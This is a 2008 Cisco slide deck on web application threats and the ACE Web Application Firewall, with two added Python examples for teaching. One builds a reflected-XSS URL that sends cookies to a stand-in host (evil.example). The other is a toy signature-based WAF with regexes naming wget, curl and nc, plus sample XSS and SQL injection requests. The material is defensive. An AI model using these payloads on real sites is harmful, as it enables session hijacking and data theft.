© 2007 Cisco Systems, Inc. All rights reserved. Cisco Confidential
Web Application Security - Cisco ACE Web App Firewall Introduction
Ong Poh Seng, Technical Specialist
14th May 2008
Agenda
Application Security Challenges
Introducing Cisco ACE Application Firewall
Deployment Use Cases
Summary / Q&A
The Evolution of Intent: A Shift to Financial Gain
Threats are becoming increasingly difficult to detect and mitigate, and applications are the primary targets.
[Chart: threat severity versus time, 1990 to 2007 and "what's next?": Vandalism (basic intrusions and viruses) → Notoriety (viruses and malware) → Financial (theft and damage)]
Applications: the Weak Link to the Crown Jewels
• Customer Confidentiality
• Identity Theft
• Data Leakage
• Service Disruption
Applications Give Unprecedented Access to Critical Business Data
The Effect of Application Attacks
Web Application Threats:
• Cross-site scripting
• SQL injection
• Command injection
• Cookie and session poisoning
• Parameter and form tampering
• Buffer overflow
• Directory traversal and forceful browsing
• Cryptographic interception
• Cookie snooping
• Authentication hijacking
• Error-message interception
• Attack obfuscation
• Application platform exploits
• DMZ protocol exploits
• Security management attacks
• Day-zero attacks
Consequences:
• Theft of customer data
• Access to unpublished pages
• Unauthorized application access
• Password theft
• Modification of data
• Disruption of service
• Website defacement
• Recovery and cleanup costs
Traditional network firewalls are blind to web application attacks
[Diagram: Web client → network firewall (ports 80 and 443 open, HTTP traffic passes unfiltered) → web server → application → database server]
75% of Attacks Focused Here
[Diagram: the application stack. The lower layers (network; operating systems; web servers, application servers and database servers) are covered by the network firewall and IDS/IPS. The top layer, business logic and code (custom web applications, customized packaged applications, internal and 3rd-party code), is the focus of today's attacks and is where an estimated 75% of attacks are aimed. There are no signatures or patches for this layer: no magic signatures or patches exist for your custom PHP script.]
PCI DSS 6.5 & 6.6
Two sections of the Payment Card Industry Data Security Standard focus on web application security: 6.5 and 6.6.
Section 6.5 requires that web applications be developed according to secure coding guidelines, with the OWASP Top 10 as the reference list of vulnerabilities to prevent. Section 6.6, a best practice until it became mandatory on 30 June 2008, requires that public-facing web applications be protected against known attacks by one of two methods: having all custom application code reviewed for common vulnerabilities, or installing an application-layer firewall (a Web Application Firewall) in front of the web-facing applications.
OWASP - 2007 Top Ten Attack List
Source: WhiteHat Security
OWASP = Open Web Application Security Project
Cross-Site Scripting (XSS) attacks
What is it? A malicious script supplied by the attacker is echoed back, unencoded, in HTML returned from a trusted web site. Because the page comes from the trusted site, the browser executes the script on the client with that site's privileges (its cookies, its DOM, its origin). Extremely widespread: some experts estimate 70%-80% of websites are vulnerable.
What are the implications?
• Web site defacement
• Session IDs stolen (cookies exported to the hacker's site)
• Browser security compromised: control given to the hacker
• All data sent between client and server potentially hijacked
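The echo described above, as an added example that is not part of the Cisco deck: a search page that reflects the q parameter back into its HTML. The hostname, page path, parameter name and the cookie-stealing payload are all constructed for illustration. The vulnerable handler writes the parameter straight into the markup; the fixed handler HTML-encodes it for the text context it lands in, which is the code-level fix that a WAF signature can only approximate from the outside.

```python
"""Reflected XSS: vulnerable vs. hardened rendering of a search page.

Added example, not from the Cisco presentation. The site name, the /search
path and the q parameter are assumptions chosen for illustration.
"""
import html
from urllib.parse import parse_qs, urlsplit

# Constructed attack URL: the victim follows a link crafted by the attacker.
# Decoded, q is: <script>document.location='http://evil.example/?c='+document.cookie</script>
ATTACK_URL = (
    "http://www.site.com/search?q="
    "%3Cscript%3Edocument.location%3D%27http%3A%2F%2Fevil.example%2F%3Fc%3D%27"
    "%2Bdocument.cookie%3C%2Fscript%3E"
)


def query_param(url: str, name: str) -> str:
    """Return the first (percent-decoded) value of query parameter `name`, or ''."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return qs.get(name, [""])[0]


def render_vulnerable(url: str) -> str:
    """Echo the search term straight into the HTML: the bug the slide describes."""
    q = query_param(url, "q")
    return f"<h1>Results for: {q}</h1>"


def render_fixed(url: str) -> str:
    """Same page, with the untrusted value HTML-encoded for the text context."""
    q = query_param(url, "q")
    return f"<h1>Results for: {html.escape(q, quote=True)}</h1>"


def contains_script_tag(markup: str) -> bool:
    """Crude check: would a browser see a <script> element in this output?"""
    return "<script" in markup.lower()


if __name__ == "__main__":
    print("vulnerable:", render_vulnerable(ATTACK_URL))
    print("fixed:     ", render_fixed(ATTACK_URL))
```

Run it to see the two renderings side by side. The encoder must match the output context (an attribute, a URL or a JavaScript string each needs its own encoding), and marking the session cookie HttpOnly keeps document.cookie out of reach of an injected script even when an XSS slips through both the code and the WAF.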
The XSS attack process
Why Not Just Fix the Code?
• Every 1000 lines of code averages 15 critical security defects. (U.S. Department of Defense)
• The average custom business application has 150,000 to 250,000 lines of code. (Software Magazine)
• The average security defect takes 75 minutes to diagnose and 6 hours to fix. (5-year Pentagon Study)
• Developers typically focus on new functions, not bugs.
• Fixing every security bug in existing code is expensive and slow.
Cisco ACE Web Application Firewall
SDN Solutions for Business Security
Cisco Self-Defending Network: Best of Breed Security in a Systems Approach
• Enforce business policies and protect critical assets
• Decrease IT administrative burden and reduce TCO
• Reduce security and compliance IT risk
System Management: Policy, Reputation, Identity
Advanced Visibility and Control: Application Security Enhancements
[Diagram: the Cisco Self-Defending Network (Best of Breed Security in a Systems Approach; System Management: Policy, Reputation, Identity) with the Web Application Firewall added as an application security component]
The Cisco ACE Web Application Firewall
The Industry's First Integrated Web and XML Application Firewall
Bullet-Proof Security for Your Custom Applications
• Offers an extensive set of Cisco-validated signatures for known malicious attack patterns.
• Provides broad compliance for PCI DSS regulations.
• Understands Web applications to allow only legitimate traffic.
• Human-assisted learning removes the guesswork from your security configuration.
Stop Application Hacking
• Dramatically reduce exposure to costly Web attacks.
• Deploy secure Web projects in a fraction of the time and cost.
• Simplify ongoing Web security management.
ACE Web Application Firewall in a nutshell
• Addresses PCI DSS 6.5 and 6.6 requirements: protects your applications and their users from most of the OWASP Top 10 attack classes
• Negative-security (signature-based) approach: deny everything that matches a known-bad pattern and permit the rest; positive-security enforcement is also available to allow only traffic that matches a known-good model
• Factory-shipped default PCI profile for instant deployment
• Monitor mode lets you switch an application between log-only and blocking at the flip of a switch, so a new policy can be watched for false positives before it drops any traffic
• Built on a fully resilient hardware platform (dual power supplies and dual disks)
• Comprehensive security for XML and HTML applications
• Heavy focus on ease of use, audit trail and attack forensics
• Aggressive price/performance (9000 transactions per second, 30K concurrent connections)
Network Deployment Examples
Network Deployment Notes
The Cisco ACE WAF is a full reverse proxy.
This means that you would typically change the DNS entry for www.site.com so that clients resolve it to the WAF's IP for www.site.com (or, better yet, to a virtual IP on your load balancer). Clients terminate their HTTP connection on the WAF, and the WAF opens its own connection to the back-end servers.
The WAF relies on the network for HA/resiliency.
A load balancer front-ending the WAF is therefore a really good idea, and it serves two purposes: scaling is easy because you can "hide" many WAFs behind a single VIP on the load balancer, and resiliency comes naturally with the load balancer's health checks and failover.
Be aware that the WAF does not handle traffic other than HTTP (HTML and XML). If it receives telnet, SSH, FTP, etc., it will drop that traffic. That makes the role of the load balancer even more important: it can selectively send only HTTP/HTTPS to the WAF and route everything else around it.
Typical Network Deployment
[Diagram: Internet → ACE (external VIP) → WAF_1, WAF_2 → ACE (internal VIP) → www1 … www4]
• Clients resolve www.site.com to a VIP residing on the ACE.
• The ACE picks a WAF and sticks the session to it.
• The WAF chooses a policy based on the Host header.
• When done with the inspection, the WAF sends the request out to an internal VIP.
• That internal VIP represents the actual www servers; the ACE performs the load-balancing decision and sticks the WAF's session to one real server.
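The inspection path on this slide, together with the "deny known bad" and monitor-mode points from the nutshell slide, as an added example that is not Cisco's code: a toy reverse-proxy WAF in Python that drops non-HTTP input, selects a policy from the Host header, runs a handful of negative-security signatures, and then either blocks or (in monitor mode) records the hits and forwards to the policy's internal VIP. The policy names, VIP addresses, hostnames, signature patterns and sample requests are all constructed for illustration; a product signature set normalises encodings far more thoroughly than the single unquote_plus used here.

```python
"""Toy reverse-proxy WAF pipeline: HTTP only -> policy by Host -> signatures -> verdict.

Added example, not Cisco ACE code. Every name, address and pattern below is assumed.
"""
import re
from dataclasses import dataclass, field
from typing import Optional
from urllib.parse import unquote_plus

# Negative-security signatures (deliberately crude; real sets are far larger and
# are applied after full decoding/normalisation of the request).
SIGNATURES = {
    "xss": re.compile(r"<\s*script|javascript:|\bon\w+\s*=", re.I),
    "sqli": re.compile(r"('|%27)\s*(or|and)\s+[\w']+\s*=|union\s+select|--\s*$", re.I | re.M),
    "traversal": re.compile(r"\.\./|\.\.\\|%2e%2e%2f", re.I),
    "cmd_injection": re.compile(r"[;&|`]\s*(cat|ls|id|wget|curl|nc)\b", re.I),
}


@dataclass
class Policy:
    name: str
    internal_vip: str            # ACE internal VIP fronting the real www servers
    mode: str = "block"          # "block" drops on a hit; "monitor" only records it
    signatures: tuple = tuple(SIGNATURES)


@dataclass
class Verdict:
    action: str                  # "forward", "block" or "drop"
    policy: Optional[str]
    matched: list = field(default_factory=list)
    forwarded_to: Optional[str] = None


# Policies keyed by Host header (assumed hostnames and VIPs).
POLICIES = {
    "www.site.com": Policy("pci-default", "10.0.1.10", mode="block"),
    "beta.site.com": Policy("beta-monitor", "10.0.1.20", mode="monitor"),
}

REQUEST_LINE = re.compile(r"^(GET|POST|PUT|DELETE|HEAD|OPTIONS) (\S+) HTTP/1\.[01]$")


def inspect(raw: bytes) -> Verdict:
    """Run one request through the pipeline described on the deployment slides."""
    text = raw.decode("latin-1")
    head, _, body = text.partition("\r\n\r\n")
    lines = head.split("\r\n")
    if not REQUEST_LINE.match(lines[0]):
        return Verdict("drop", None)              # telnet, SSH, FTP...: not HTTP, dropped
    headers = {}
    for line in lines[1:]:
        key, _, value = line.partition(":")
        headers[key.strip().lower()] = value.strip()
    host = headers.get("host", "").split(":")[0].lower()
    policy = POLICIES.get(host)
    if policy is None:
        return Verdict("block", None)             # no policy for this Host: fail closed
    target = unquote_plus(lines[0].split(" ")[1])
    subject = target + "\n" + unquote_plus(body)  # decoded request line + body
    matched = [name for name in policy.signatures if SIGNATURES[name].search(subject)]
    if matched and policy.mode == "block":
        return Verdict("block", policy.name, matched)
    # Clean request, or a hit under monitor mode: log the hits and forward to the internal VIP.
    return Verdict("forward", policy.name, matched, policy.internal_vip)


# Constructed sample traffic.
CLEAN = b"GET /search?q=ace+waf HTTP/1.1\r\nHost: www.site.com\r\n\r\n"
XSS = b"GET /search?q=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1\r\nHost: www.site.com\r\n\r\n"
SQLI_BETA = (b"POST /login HTTP/1.1\r\nHost: beta.site.com\r\n"
             b"Content-Type: application/x-www-form-urlencoded\r\n\r\n"
             b"user=admin'+or+'1'%3D'1&pass=x")
NOT_HTTP = b"SSH-2.0-OpenSSH_5.1\r\n"

if __name__ == "__main__":
    for label, req in [("clean", CLEAN), ("xss", XSS), ("sqli/beta", SQLI_BETA), ("ssh", NOT_HTTP)]:
        print(f"{label:10} -> {inspect(req)}")
```

The beta policy shows what monitor mode buys you: the SQL injection attempt is recorded against the policy but still forwarded, so a new rule set can be watched for false positives on real traffic before it is switched to block. Note also that an unknown Host header fails closed rather than being forwarded unprotected.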
Cisco ACE Web Application Firewall Deployment
[Diagram: Web client → Internet → network firewall → DMZ containing the Cisco ACE Application Switch, two Cisco ACE Web Application Firewalls and the Cisco ACE Web Application Manager → data center containing a second Cisco ACE Application Switch, the portal, Web-enabled applications, applications and identity management systems]
Cisco ACE XML Firewall Deployment
[Diagram: external XML Web Services consumers → Internet → network firewall → DMZ containing the ACE, ACE XML Gateways and the ACE XML Manager → data center containing the portal, XML Web Services-aware applications and identity management systems]
Key Use Cases: Perimeter Security, XML Acceleration and Offload, Web 2.0, Web Service Integration
Cisco ACE Web Application Firewall Summary
Full-featured Web application firewall with integrated XML firewall
Extend protection for traditional HTML-based Web applications to modern XML-enabled Web services applications.
Access enforcement
Secure applications from unauthorized access with the AAA enforcement mechanism.
Positive and negative security enforcement
Enjoy the best of both worlds by keeping bad traffic patterns out and allowing only good traffic through.
Human-assisted learning
Deploy policies and profiles in monitoring mode to prevent application downtime due to the false positives typical of an automated learning environment.
Policy-based provisioning
Achieve increased developer productivity and ease of deployment with a sophisticated GUI, rollback, and versioning capabilities.
Defense-in-Depth Should Include a Web Application Firewall that Can Quickly, Effectively, and Cost-Effectively Block Attacks at Layers 5–7.